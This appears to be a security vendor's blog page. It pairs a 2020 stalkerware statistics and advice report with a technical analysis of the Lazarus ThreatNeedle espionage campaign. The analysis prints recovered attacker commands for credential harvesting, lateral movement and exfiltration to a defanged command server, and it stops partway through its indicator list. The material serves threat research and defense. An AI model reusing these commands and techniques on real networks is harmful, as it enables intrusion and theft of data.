Stalkerware is software that is commercially available to everyone with access to the internet. It is used to spy remotely on another person via their device, without the affected user giving their consent or being notified. Stalkerware operates in stealth mode, meaning that there is no icon displayed on the device indicating its presence, and it is not visible to the affected user. Therefore, the Coalition Against Stalkerware defines stalkerware as software which “may facilitate intimate partner surveillance, harassment, abuse, stalking, and/or violence”.

The dimension of cyberviolence

According to a report by the European Institute for Gender Equality, “seven in ten women in Europe who have experienced cyberstalking have also experience at least one form of physical and/or sexual violence from an intimate partner”. Echoing these findings, experts from non-profit organizations (NPOs) that help domestic abuse survivors and victims emphasize that cyberstalking is also a form of violence. Just as with physical, psychological, and economic violence, an abuser can use surveillance to obtain complete control of their victim/survivor[1] and stay in charge of the situation.

Using stalkerware, the extent of control held by the abuser can be immense. Depending on the type installed, stalkerware may have a variety of functions to intrude into the victim’s privacy. With the software’s help, an abuser can:

  • Read anything the surveilled person types – logging each keystroke on the device, including credentials to any kind of services such as banking applications, online shops and social networks, etc.
  • Know where they are – by tracking a person’s movements with GPS, in real time
  • Hear what they say – eavesdrop on calls, or even record them
  • Read messages on any messenger, regardless of whether encryption is used
  • Monitor social network activity
  • See photos and videos
  • Switch on the camera

All of this private information can be collected, usually from a mobile device, such as a tablet or a smartphone.

Non-profit organizations from the Coalition Against Stalkerware are experiencing a growing number of survivors seeking help with the problem:

  • Findings from the Second National Survey on technology abuse and domestic violence in Australia, launched by WESNET with the assistance of Dr. Delanie Woodlock and researchers from Curtin University, state that 99.3% of domestic violence practitioners have clients experiencing technology-facilitated abuse and that the use of video cameras increased by 183.2% between 2015 and 2020.
  • According to a study on cyberviolence in intimate relationships, conducted by the Centre Hubertine Auclert in France, 21% of victims have experienced stalkerware at the hands of their abusive partner, and 69% of victims have the feeling that the personal information on their smartphone has been accessed by their partner in a hidden way.
  • In Germany, for several years, Women’s Counselling Centers and Rape Crisis Centers (bff) have noticed an increasing use of stalkerware in conjunction with partner relationships.
  • In the USA, stalking impacts an estimated 6-7.5 million people over a one-year period, and one-in-four victims report being stalked through some form of technology, according to the Stalking Prevention Awareness & Resource Center (SPARC).
Physical access is the key

Unfortunately, it is not too difficult to secretly install stalkerware on a victim’s phone. The main barrier that exists is that stalkerware has to be configured on an affected device. Due to the distribution vector of such applications which are very different from common malware distribution schemes, it is impossible to get infected with a stalkerware through a spam message including a link to stalkerware or a trap via normal web surfing.

This means that the abuser will need to have physical access to the target device in order to install stalkerware. This is possible if the device either has no pin, pattern, or password to protect it or alternatively, the abuser knows the victim/survivor personally. Installation on the target device can be completed within a few minutes.

Prior to accessing the survivor’s device, the abuser has to collect a link to the installation package from the stalkerware developer’s webpage. In most cases, the software is not downloaded from an official application store. For Android devices, Google banned applications that are clearly stalkerware from its Google Play application store in 2020. This means the abuser will not be able to install such an application from the general app store. Instead, the abuser must follow several steps before being able to install stalkerware. As a result, the abuser may leave traces in the device settings that a user can check if they are concerned they may be being spied on.

Stalkerware tools are less frequent on iPhones than on Android devices because iOS is traditionally a closed system. However, perpetrators can work around this limitation on jailbroken iPhones. They still need physical access to the phone to jailbreak it, so iPhone users who fear surveillance should always keep an eye on their device. Alternatively, an abuser can offer their victim an iPhone – or any other device – with pre-installed stalkerware as a gift. There are many companies who make their services available online to install such tools on a new phone and deliver it to an unwitting addressee in factory packaging to celebrate a special occasion.

The risk of privacy leaks

The information monitored via stalkerware will be available to at least one person – the abuser who installed stalkerware on the survivor’s phone. However, sometimes it is possible that all the private data may become publically available. Year on year, stalkerware servers are either hacked or left openly unprotected so that information can be accessed and leaked online. For example, in 2020, such a data breach occurred due to a product provided by ClevGuard. In previous years, we have seen similar incidents with Mobiispy in 2019 and with MSpy in 2018 and 2015.

These are just a few examples of a long list in which databases from companies developing stalkerware have been exposed, affecting millions of user accounts. With the possibility to track a person’s location, it means that not only their cyberprivacy is lost but also their security in the physical world may be at risk.

The legal status

Stalkerware applications are sold and provided by companies under various facades, such as child monitoring or employee tracking solutions. While laws vary from one country and state to another, they are catching up. Generally speaking, it is only illegal to use such tools and apps that record user activity without their consent or that of legal authority. Slowly we are seeing some shifts in legislation. For instance, in 2020, France reinforced sanctions on secret surveillance: geolocating someone without their consent is now punishable with one year imprisonment and a fine of 45,000 euros. If this is done within a couple, the sanctions are potentially higher, including two years’ imprisonment and a fine of 60,000 euros.

Stalkerware tools often violate laws and expose the stalker to legal liability for any recordings made without the victim’s knowledge. Stalkers must realize that they are breaking the law. If the use of stalkerware is reported, the punishment applies to the private perpetrator who installed the software – not its vendor. In the USA, only two stalking app developers have been fined in recent history. One had to pay a record 500,000 US dollar fine, which put an end to the app development process, while the other got off with an order to change the app’s functionality for future sales.

The scale of the issue Global detection figures – affected users

In this section, we look at the global numbers of unique users whose mobile device was found to have stalkerware detected.

The 2020 data shows that the stalkerware situation has not improved much: the number of affected people is still high. A total of 53,870 unique users were affected globally by stalkerware in 2020. Whereas in 2019, 66,927 unique users were affected globally. However, the fact must be taken into account that 2020 was an unprecedented year in which lives have changed in a dramatic way across the globe.

To fight the COVID-19 pandemic, all countries in the world have faced massive restrictions such as self-isolation measures or lockdowns in order to make people stay at home. Considering that stalkerware is used as another tool to control an intimate partner who the abuser lives with as they go about their day-to-day life, this can explain the somewhat lower numbers in comparison with the previous year.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Unique users affected by stalkerware globally from 2018 until 2020 – total per year (download)

When looking at the figures of the total number of unique users affected by stalkerware in 2020 worldwide per month, this trend becomes even more noticeable. The first two months of the year were stable with many cases of affected devices arising, showing stalkerware was quite popular. The situation changed in March when many countries decided to announce quarantine measures. The curve shows a trend that the numbers began to stabilize as of June 2020 when many countries around the world eased restrictions.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Unique users affected by stalkerware in 2020 worldwide – total by month (download)

That said, the 2020 numbers are still on a high, stable level. In comparison, in 2018, there were 40,173 detections of unique users being affected globally by stalkerware. This brings into perspective the total numbers from 2020, as we have seen a growing integration of technology into our lives. Sadly, this also means the software used for stalking is becoming more common as another form of intimate partner violence.

Global detection figures – stalkerware samples

In this section, we analyze which stalkerware samples are actually the most used to control mobile devices on a global level. In 2020 the most detected samples can be seen in the following results.

Top 10 most detected stalkerware samples globally

  Samples Affected users 1 Monitor.AndroidOS.Nidb.a 8147 2 Monitor.AndroidOS.Cerberus.a 5429 3 Monitor.AndroidOS.Agent.af 2727 4 Monitor.AndroidOS.Anlost.a 2234 5 Monitor.AndroidOS.MobileTracker.c 2161 6 Monitor.AndroidOS.PhoneSpy.b 1774 7 Monitor.AndroidOS.Agent.hb 1463 8 Monitor.AndroidOS.Cerberus.b 1310 9 Monitor.AndroidOS.Reptilic.a 1302 10 Monitor.AndroidOS.SecretCam.a 1124
  1. With more than 8,100 users having been affected by it, Nidb was the most used stalkerware sample in 2020. The Nidb creator sells their product as Stalkerware as a Service. This means that anyone could rent their control server software and mobile application, rename it to any suitable marketing name and sell it separately—examples of this include iSpyoo, TheTruthSpy, Copy9, and others.
  2. Both second and eighth place are occupied by Cerberus. These are two different samples under the same family. Variant Cerberus.a affected more than 5,400 users.
  3. Agent.af comes in third place, with more than 2,700 users having been affected. This is marketed as Track My Phone and has typical features such as reading messages from any messenger, logging a person’s call history, and tracking geolocation.
  4. Anlost.a is a good example of stalkerware in disguise. It is advertised as an antitheft application, and its icon is present on the home screen (not usual behavior for stealthy stalkerware apps). Therefore, it is available on the Google Play Store. That said, it is possible to deliberately hide the icon from the home screen. One of the key functionalities of the application is to intercept SMS messages and read the call log. More than 2,200 users having been affected by this sample.
  5. MobileTracker.c has several functionalities such as intercepting messages from popular social networks and taking remote control of the affected device. More than 2,100 users having been affected by this sample.
  6. PhoneSpy is also known as Spy Phone app or Spapp Monitoring. This application consists of many spy features, covering all popular instant messengers and social networks.
  7. Agent.hb is another version of MobileTracker. Like the original version, it offers many functionalities.
  8. Cerberus.b, a different sample from the same family as Cerberus.a.
  9. Reptilic.a is stalkerware that includes many features such as social media monitoring, call recordings, and browser history monitoring.
  10. SecretCam.a is camera stalking software, meaning it is able to secretly record video from the front or back camera of the affected device.
Geography of affected users

Stalkerware is a global phenomenon that affects countries regardless of size, society, or culture. When looking at the top 10 affected countries worldwide in 2020, Kaspersky’s findings show that largely the same countries remain the most affected, with Russia in the number one spot. Yet, we see an increase in stalkerware activity in Brazil and the USA in 2020 compared to 2019. However, we detected fewer incidents in India, which has fallen in the rankings. We have also detected a higher number of incidents in Mexico, which has risen in the ranking two places.

Top 10 most affected countries by stalkerware – globally

  Country Affected users 1 Russian Federation 12389 2 Brazil 6523 3 United States of America 4745 4 India 4627 5 Mexico 1570 6 Germany 1547 7 Iran 1345 8 Italy 1144 9 United Kingdom 1009 10 Saudi Arabia 968

When considering Europe, Germany, Italy and the UK are the three most affected countries, in that order. They are followed by France in fourth place and Spain in fifth place.

Top 10 most affected countries by stalkerware – Europe

  Country Affected users 1 Germany 1547 2 Italy 1144 3 United Kingdom 1009 4 France 904 5 Spain 873 6 Poland 444 7 Netherlands 321 8 Romania 222 9 Belgium 180 10 Austria 153 How to check if a mobile device has stalkerware installed

It’s hard for everyday users to know if stalkerware is installed on their devices. Generally, this type of software remains hidden which includes hiding the icon of the stalkerware app on the home screen and in the phone menu and even cleaning any traces that have been made. However, it may give itself away and there are some warning signs. Among the most important are:

  • Keep an eye out for a fast draining battery, constant overheating and mobile data traffic growth.
  • Do regular antivirus scanning on your Android device: If the cybersecurity solution detected stalkerware, do not rush to remove it as the abuser may notice. Have a safety plan in place and reach out to a local help organization.
  • Check browser history: To download stalkerware, the abuser will have to visit some web pages, the affected user does not know about. Alternatively, there could be no history at all if abuse wiped it out.
  • Check “unknown sources” settings: If “unknown sources” are enabled on your device, it might be a sign that unwanted software were installed from third-party source.
  • Check permissions of installed apps: Stalkerware application may be disguised under a wrong name with suspicious access to messages, call logs, location, and other personal activity.

However, it’s also important to understand that warning signs or symptoms are not necessarily proof that stalkerware is installed on a device.

How to minimize the risk

There are a few pieces of advice that can help to increase your digital safety:

  • Never lend your phone to anyone without seeing what happens with the phone and not leave it unlocked.*
  • Use a complex lock screen password and change passwords on a regular basis.
  • Do not disclose your password to anyone – not even your intimate partner or family members or close friends.*
  • Do regular checks of your phone— delete apps you don’t use and review the permissions granted to each app.
  • Disable the option of third-party application installation on Android devices.
  • Protect your Android devices with a cyber-security solution, such as Kaspersky Internet Security for Android (for free), which detects stalkerware and issues warnings.

*In the context of domestic violence and abusive relationships it may be difficult or even impossible to deny the abusive partner access to the phone.

Kaspersky’s activities and contribution to end cyberviolence

Kaspersky is actively working to end the use of cyberviolence and stalkerware, as a company, and together with many other partners. In 2019, we created a special alert that notifies users when stalkerware is installed on their phones. In the same year, with nine other founding members we created the Coalition Against Stalkerware. In 2020, we created TinyCheck, a free tool to detect stalkerware on mobile devices – specifically for service organizations working with victims of domestic violence. TinyCheck can be found on https://github.com/KasperskyLab/TinyCheck. Since 2021, we are one of five partners in an EU-wide project aimed at tackling gender-based cyberviolence and stalkerware called DeStalk, which the European Commission chose to support with its Rights, Equality and Citizenship Program.

About the Coalition Against Stalkerware

The Coalition Against Stalkerware (“CAS” or “Coalition”) is a group dedicated to addressing abuse, stalking, and harassment via the creation and use of stalkerware. Launched in November 2019, the Coalition Against Stalkerware gained 26 partners in its first year. These include founding partners – Avira, Electronic Frontier Foundation, the European Network for the Work with Perpetrators of Domestic Violence, G DATA Cyber Defense, Kaspersky, Malwarebytes, The National Network to End Domestic Violence, NortonLifeLock, Operation Safe Escape, and WEISSER RING. The Coalition looks to bring together a diverse array of organizations to actively address the criminal behavior perpetrated through stalkerware and increase public awareness about this important issue. Due to the high societal relevance for users all over the globe and new variants of stalkerware emerging periodically, the Coalition Against Stalkerware is open to new partners and calls for cooperation. To find out more about the Coalition Against Stalkerware please visit the official website www.stopstalkerware.org

[1] Experts refer in their terminology more and more to the empowering term survivor instead of victim. Hence, in this report, we will use both terms.

2021. február 25.

Lazarus targets defense industry with ThreatNeedle

Lazarus targets defense industry with ThreatNeedle (PDF)

We named Lazarus the most active group of 2020. We’ve observed numerous activities by this notorious APT group targeting various industries. The group has changed target depending on the primary objective. Google TAG has recently published a post about a campaign by Lazarus targeting security researchers. After taking a closer look, we identified the malware used in those attacks as belonging to a family that we call ThreatNeedle. We have seen Lazarus attack various industries using this malware cluster before. In mid-2020, we realized that Lazarus was launching attacks on the defense industry using the ThreatNeedle cluster, an advanced malware cluster of Manuscrypt (a.k.a. NukeSped). While investigating this activity, we were able to observe the complete life cycle of an attack, uncovering more technical details and links to the group’s other campaigns.

The group made use of COVID-19 themes in its spear-phishing emails, embellishing them with personal information gathered using publicly available sources. After gaining an initial foothold, the attackers gathered credentials and moved laterally, seeking crucial assets in the victim environment. We observed how they overcame network segmentation by gaining access to an internal router machine and configuring it as a proxy server, allowing them to exfiltrate stolen data from the intranet network to their remote server. So far organizations in more than a dozen countries have been affected.

During this investigation we had a chance to look into the command-and-control infrastructure. The attackers configured multiple C2 servers for various stages, reusing several scripts we’ve seen in previous attacks by the group. Moreover, based on the insights so far, it was possible to figure out the relationship with other Lazarus group campaigns.

The full article is available on Kaspersky Threat Intelligence.
For more information please contact: ics-cert@kaspersky.com

Initial infection

In this attack, spear phishing was used as the initial infection vector. Before launching the attack, the group studied publicly available information about the targeted organization and identified email addresses belonging to various departments of the company.

Email addresses in those departments received phishing emails that either had a malicious Word document attached or a link to one hosted on a remote server. The phishing emails claimed to have urgent updates on today’s hottest topic – COVID-19 infections. The phishing emails were carefully crafted and written on behalf of a medical center that is part of the organization under attack.

Phishing email with links to malicious documents

The attackers registered accounts with a public email service, making sure the sender’s email addresses looked similar to the medical center’s real email address. The signature shown in the phishing emails included the actual personal data of the deputy head doctor of the attacked organization’s medical center. The attackers were able to find this information on the medical center’s public website.

A macro in the Microsoft Word document contained the malicious code designed to download and execute additional malicious software on the infected system.

The document contains information on the population health assessment program and is not directly related to the subject of the phishing email (COVID-19), suggesting the attackers may not completely understand the meaning of the contents they used.

Contents of malicious document

The content of the lure document was copied from an online post by a health clinic.

Our investigation showed that the initial spear-phishing attempt was unsuccessful due to macros being disabled in the Microsoft Office installation of the targeted systems. In order to persuade the target to allow the malicious macro, the attacker sent another email showing how to enable macros in Microsoft Office.

Email with instructions on enabling macros #1

After sending the above email with explanations, the attackers realized that the target was using a different version of Microsoft Office and therefore required a different procedure for enabling macros. The attackers subsequently sent another email showing the correct procedure in a screenshot with a Russian language pack.

Email with instructions on enabling macros #2

The content in the spear-phishing emails sent by the attackers from May 21 to May 26, 2020, did not contain any grammatical mistakes. However, in subsequent emails the attackers made numerous errors, suggesting they may not be native Russian speakers and were using translation tools.

Email containing several grammatical mistakes

On June 3, 2020, one of the malicious attachments was opened by employees and at 9:30 am local time the attackers gained remote control of the infected system.

This group also utilized different types of spear-phishing attack. One of the compromised hosts received several spear-phishing documents on May 19, 2020. The malicious file that was delivered, named Boeing_AERO_GS.docx, fetches a template from a remote server.

However, no payload created by this malicious document could be discovered. We speculate that the infection from this malicious document failed for a reason unknown to us. A few days later, the same host opened a different malicious document. The threat actor wiped these files from disk after the initial infection meaning they could not be obtained.

Nonetheless, a related malicious document with this malware was retrieved based on our telemetry. It creates a payload and shortcut file and then continues executing the payload by using the following command line parameters.

  • Payload path: %APPDATA%\Microsoft\Windows\lconcaches.db
  • Shortcut path: %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\OneDrives.lnk
  • Command Line; please note that the string at the end is hard-coded, but different for each sample:
  • exe [dllpath],Dispatch n2UmQ9McxUds2b29

The content of the decoy document depicts the job description of a generator/power industry engineer.

Decoy document

Malware implants

Upon opening a malicious document and allowing the macro, the malware is dropped and proceeds to a multistage deployment procedure. The malware used in this campaign belongs to a known malware cluster we named ThreatNeedle. We attribute this malware family to the advanced version of Manuscrypt (a.k.a. NukeSped), a family belonging to the Lazarus group. We previously observed the Lazarus group utilizing this cluster when attacking cryptocurrency businesses and a mobile game company. Although the malware involved and the entire infection process is known and has not changed dramatically compared to previous findings, the Lazarus group continued using ThreatNeedle malware aggressively in this campaign.

Infection procedure

The payload created by the initial spear-phishing document loads the next stage as a backdoor running in-memory – the ThreatNeedle backdoor. ThreatNeedle offers functionality to control infected victims. The actor uses it to carry out initial reconnaissance and deploy additional malware for lateral movement. When moving laterally, the actor uses ThreatNeedle installer-type malware in the process. This installer is responsible for implanting the next stage loader-type malware and registering it for auto-execution in order to achieve persistence. The ThreatNeedle loader-type malware exists in several variations and serves the primary purpose of loading the final stage of the ThreatNeedle malware in-memory.

ThreatNeedle installer

Upon launch, the malware decrypts an embedded string using RC4 (key: B6 B7 2D 8C 6B 5F 14 DF B1 38 A1 73 89 C1 D2 C4) and compares it to “7486513879852“. If the user executes this malware without a command line parameter, the malware launches a legitimate calculator carrying a dark icon of the popular Avengers franchise.

Further into the infection process, the malware chooses a service name randomly from netsvc in order to use it for the payload creation path. The malware then creates a file named bcdbootinfo.tlp in the system folder containing the infection time and the random service name that is chosen. We’ve discovered that the malware operator checks this file to see whether the remote host was infected and, if so, when the infection happened.

It then decrypts the embedded payload using the RC4 algorithm, saves it to an .xml extension with a randomly created five-character file name in the current directory and then copies it to the system folder with a .sys extension.

This final payload is the ThreatNeedle loader running in memory. At this point the loader uses a different RC4 key (3D 68 D0 0A B1 0E C6 AF DD EE 18 8E F4 A1 D6 20), and the dropped malware is registered as a Windows service and launched. In addition, the malware saves the configuration data as a registry key encrypted in RC4:

  • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\GameConfig – Description
ThreatNeedle loader

This component is responsible for loading the final backdoor payload into memory. In order to do this, the malware uses several techniques to decrypt its payload:

  • Loading the payload from the registry.
  • Loading the payload from itself after decrypting RC4 and decompression.
  • Loading the payload from itself after decrypting AES and decompression.
  • Loading the payload from itself after decompression.
  • Loading the payload from itself after one-byte XORing.

Most loader-style malware types check the command line parameter and only proceed with the malicious routine if an expected parameter is given. This is a common trait in ThreatNeedle loaders. The most common example we’ve seen is similar to the ThreatNeedle installer – the malware decrypts an embedded string using RC4, and compares it with the parameter “Sx6BrUk4v4rqBFBV” upon launch. If it matches, the malware begins decrypting its embedded payload using the same RC4 key. The decrypted payload is an archive file which is subsequently decompressed in the process. Eventually, the ThreatNeedle malware spawns in memory.

The other variant of the loader is preparing the next stage payload from the victim’s registry. As we can see from the installer malware description, we suspect that the registry key was created by the installer component. Retrieved data from the registry is decrypted using RC4 and then decompressed. Eventually, it gets loaded into memory and the export function is invoked.

ThreatNeedle backdoor

The final payload executed in memory is the actual ThreatNeedle backdoor. It has the following functionality to control infected victim machines:

  • Manipulate files/directories
  • System profiling
  • Control backdoor processes
  • Enter sleeping or hibernation mode
  • Update backdoor configuration
  • Execute received commands
Post-exploitation phase

From one of the hosts, we discovered that the actor executed a credential harvesting tool named Responder and moved laterally using Windows commands. Lazarus overcame network segmentation, exfiltrating data from a completely isolated network segment cut off from the internet by compromising a router virtual machine, as we explain below under “Overcoming network segmentation“.

Judging by the hosts that were infected with the ThreatNeedle backdoors post-exploitation, we speculate that the primary intention of this attack is to steal intellectual property. Lastly, the stolen data gets exfiltrated using a custom tool that will be described in the “Exfiltration” section. Below is a rough timeline of the compromise we investigated:

Timeline of infected hosts

Credential gathering

During the investigation we discovered that the Responder tool was executed from one of the victim machines that had received the spear-phishing document. One day after the initial infection, the malware operator placed the tool onto this host and executed it using the following command:

  • [Responder file path] -i [IP address] -rPv

Several days later, the attacker started to move laterally originating from this host. Therefore, we assess that the attacker succeeded in acquiring login credentials from this host and started using them for further malicious activity.

Lateral movement

After acquiring the login credentials, the actor started to move laterally from workstations to server hosts. Typical lateral movement methods were employed, using Windows commands. First, a network connection with a remote host was established using the command “net use”.

  • net use \\[IP address]\IPC$ “[password]” /u:”[user name]” > $temp\~tmp5936t.tmp 2>&1″

Next, the actor copied malware to the remote host using the Windows Management Instrumentation Command-line (WMIC).

  • exe /node:[IP address] /user:”[user name]” /password:”[password]” PROCESS CALL CREATE “cmd.exe /c $appdata\Adobe\adobe.bat
  • exe /node:[IP address] /user:”[user name]” /password:”[password]” PROCESS CALL CREATE “cmd /c sc queryex helpsvc > $temp\tmp001.dat
Overcoming network segmentation

In the course of this research, we identified another highly interesting technique used by the attackers for lateral movement and exfiltration of stolen data. The enterprise network under attack was divided into two segments: corporate (a network on which computers had internet access) and restricted (a network on which computers hosted sensitive data and had no internet access). According to corporate policies, no transfer of information was allowed between these two segments. In other words, the two segments were meant to be completely separated.

Initially, the attackers were able to get access to systems with internet access and spent a long time distributing malware between machines in the network’s corporate segment. Among the compromised machines were those used by the administrators of the enterprise’s IT infrastructure.

It is worth noting that the administrators could connect both to the corporate and the restricted network segments to maintain systems and provide users with technical support in both zones. As a result, by gaining control of administrator workstations the attackers were able to access the restricted network segment.

However, since directly routing traffic between the segments was not possible, the attackers couldn’t use their standard malware set to exfiltrate data from the restricted segment to the C2.

The situation changed on July 2 when the attackers managed to obtain the credentials for the router used by the administrators to connect to systems in both segments. The router was a virtual machine running CentOS to route traffic between several network interfaces based on predefined rules.

Connection layout between victim’s network segments

According to the evidence collected, the attackers scanned the router’s ports and detected a Webmin interface. Next, the attackers logged in to the web interface using a privileged root account. It’s unknown how the attackers were able to obtain the credentials for that account, but it’s possible the credentials were saved in one of the infected system’s browser password managers.

Log listing Webmin web interface logins

By gaining access to the configuration panel the attackers configured the Apache web server and started using the router as a proxy server between the organization’s corporate and restricted segments.

List of services used on the router

Several days after that, on July 10, 2020, the attackers connected to the router via SSH and set up the PuTTy PSCP (the PuTTY Secure Copy client) utility on one of the infected machines. This utility was used to upload malware to the router VM. This enabled the attackers to place malware onto systems in the restricted segment of the enterprise network, using the router to host the samples. In addition, malware running in the network’s restricted segment was able to exfiltrate the collected data to the command-and-control server via the Apache server set up on the same router.

New connection layout after attacker’s intrusion

In the course of the investigation we identified malware samples with the hardcoded URL of the router used as a proxy server.

Hardcoded proxy address in the malware

Since the attackers regularly deleted log files from the router, only a handful of commands entered to the command line via SSH could be recovered. An analysis of these commands shows that the attackers tried to reconfigure traffic routing using the route command.

Attacker commands

The attackers also ran the nmap utility on the router VM and scanned ports on systems within the restricted segment of the enterprise network. On September 27, the attackers started removing all traces of their activity from the router, using the logrotate utility to set up automatic deletion of log files.

Webmin log

Exfiltration

We observed that the malware operator attempted to create SSH tunnels to a remote server located in South Korea from several compromised server hosts. They used a custom tunneling tool to achieve this. The tool receives four parameters: client IP address, client port, server IP address and server port. The tool offers basic functionality, forwarding client traffic to the server. In order to create a covert channel, the malware encrypts forwarded traffic using trivial binary encryption.

Encryption routine

Using the covert channel, the adversary copied data from the remote server over to the host using the PuTTy PSCP tool:

  • %APPDATA%\PBL\unpack.tmp  -pw [password] root@[IP address]:/tmp/cab0215 %APPDATA%\PBL\cab0215.tmp

After copying data from the server, the actor utilized the custom tool to exfiltrate stolen data to the remote server. This malware looks like a legitimate VNC client and runs like one if it’s executed without any command line parameters.

Execution of malware without parameters

However, if this application is executed with specific command line parameters, it runs an alternate, malicious function. According to our telemetry, the actor executed this application with six parameters:

  • %APPDATA%\Comms\Comms.dat S0RMM-50QQE-F65DN-DCPYN-5QEQA hxxps://www.gonnelli[.]it/uploads/catalogo/thumbs/thumb[.]asp %APPDATA%\Comms\cab59.tmp FL0509 15000

Also, if the number of command line parameters is greater than six, the malware jumps into a malicious routine. The malware also checks the length of the second argument – if it’s less than 29 characters, it terminates the execution. When the parameter checking procedure has passed successfully, the malware starts to decrypt its next payload.

The embedded payload gets decrypted via XOR, where each byte from the end of the payload gets applied to the preceding byte. Next, the XORed blob receives the second command line argument that’s provided (in this case S0RMM-50QQE-F65DN-DCPYN-5QEQA). The malware can accept more command line arguments, and depending on its number it runs differently. For example, it can also receive proxy server addresses with the “-p” option.

When the decrypted in-memory payload is executed, it compares the header of the configuration data passed with the string “0x8406” in order to confirm its validity. The payload opens a given file (in this example %APPDATA%\Comms\cab59.tmp) and starts exfiltrating it to the remote server. When the malware uploads data to the C2 server, it uses HTTP POST requests with two parameters named ‘fr’ and ‘fp’:

  • The ‘fr’ parameter contains the file name from the command line argument to upload.
  • The ‘fp’ parameter contains the base64 encoded size, CRC32 value of content and file contents.

Contents of fp parameter

Attribution

We have been tracking ThreatNeedle malware for more than two years and are highly confident that this malware cluster is attributed only to the Lazarus group. During this investigation, we were able to find connections to several clusters of the Lazarus group.

Connections between Lazarus campaigns

Connection with DeathNote cluster

During this investigation we identified several connections with the DeathNote (a.k.a. Operation Dream Job) cluster of the Lazarus group. First of all, among the hosts infected by the ThreatNeedle malware, we discovered one that was also infected with the DeathNote malware, and both threats used the same C2 server URLs.

In addition, while analyzing the C2 server used in this attack, we found a custom web shell script that was also discovered on the DeathNote C2 server. We also identified that the server script corresponding to the Trojanized VNC Uploader was found on the DeathNote C2 server.

Although DeathNote and this incident show different TTPs, both campaigns share command and control infrastructure and some victimology.

Connection with Operation AppleJeus

We also found a connection with Operation AppleJeus. As we described, the actor used a homemade tunneling tool in the ThreatNeedle campaign that has a custom encryption routine to create a covert channel. This very same tool was utilized in operation AppleJeus as well.

Same tunneling tool

Connection with Bookcode cluster

In our previous blog about Lazarus group, we mentioned the Bookcode cluster attributed to Lazarus group; and recently the Korea Internet and Security Agency (KISA) also published a report about the operation. In the report, they mentioned a malware cluster named LPEClient used for profiling hosts and fetching next stage payloads. While investigating this incident, we also found LPEClient from the host infected with ThreatNeedle. So, we assess that the ThreatNeedle cluster is connected to the Bookcode operation.

Conclusions

In recent years, the Lazarus group has focused on attacking financial institutions around the world. However, beginning in early 2020, they focused on aggressively attacking the defense industry. While Lazarus has also previously utilized the ThreatNeedle malware used in this attack when targeting cryptocurrency businesses, it is currently being actively used in cyberespionage attacks.

This investigation allowed us to create strong ties between multiple campaigns that Lazarus has conducted, reinforcing our attribution. In this campaign the Lazarus group demonstrated its sophistication level and ability to circumvent the security measures they face during their attacks, such as network segmentation. We assess that Lazarus is a highly prolific group, conducting several campaigns using different strategies. They shared tools and infrastructure among these campaigns to accomplish their goals.

Appendix I – Indicators of Compromise

Malicious documents

e7aa0237fc3db67a96ebd877806a2c88 Boeing_AERO_GS.docx

Installer

b191cc4d73a247afe0a62a8c38dc9137 %APPDATA%\Microsoft\DRM\logon.bin 9e440e231ef2c62c78147169a26a1bd3 C:\ProgramData\ntnser.bin b7cc295767c1d8c6c68b1bb6c4b4214f C:\ProgramData\ntnser.bin 0f967343e50500494cf3481ce4de698c C:\ProgramData\Microsoft\MSDN\msdn.bin 09aa1427f26e7dd48955f09a9c604564 %APPDATA\Microsoft\info.dat 07b22533d08f32d48485a521dbc1974d C:\ProgramData\adobe\load.dat 1c5e4d60a1041cf2903817a31c1fa212 C:\ProgramData\Adobe\adobe.tmp 4cebc83229a40c25434c51ee3d6be13e C:\ProgramData\Adobe\up.tmp 23b04b18c75aa7d286fea5d28d41a830 %APPDATA%\Microsoft\DRM\logon.dat 319ace20f6ffd39b7fff1444f73c9f5d %APPDATA%\Microsoft\DRM\logon.bin 45c0a6e13cad26c69eff59fded88ef36 %APPDATA%\Microsoft\DRM\logon.dat 486f25db5ca980ef4a7f6dfbf9e2a1ad C:\ProgramData\ntusers.dat 1333967486d3ab50d768fb745dae9af5 C:\PerfLogs\log.bin 07b22533d08f32d48485a521dbc1974d C:\ProgramData\Adobe\load.dat c86d0a2fa9c4ef59aa09e2435b4ab70c %TEMP%\ETS4659.tmp 69d71f06fbfe177fb1a5f57b9c3ae587 %APPDATA%\Microsoft\Windows\shsvcs.db 7bad67dcaf269f9ee18869e5ef6b2dc1   956e5138940a4f44d1c2c24f122966bd %APPDATA%\ntuser.bin

Loader

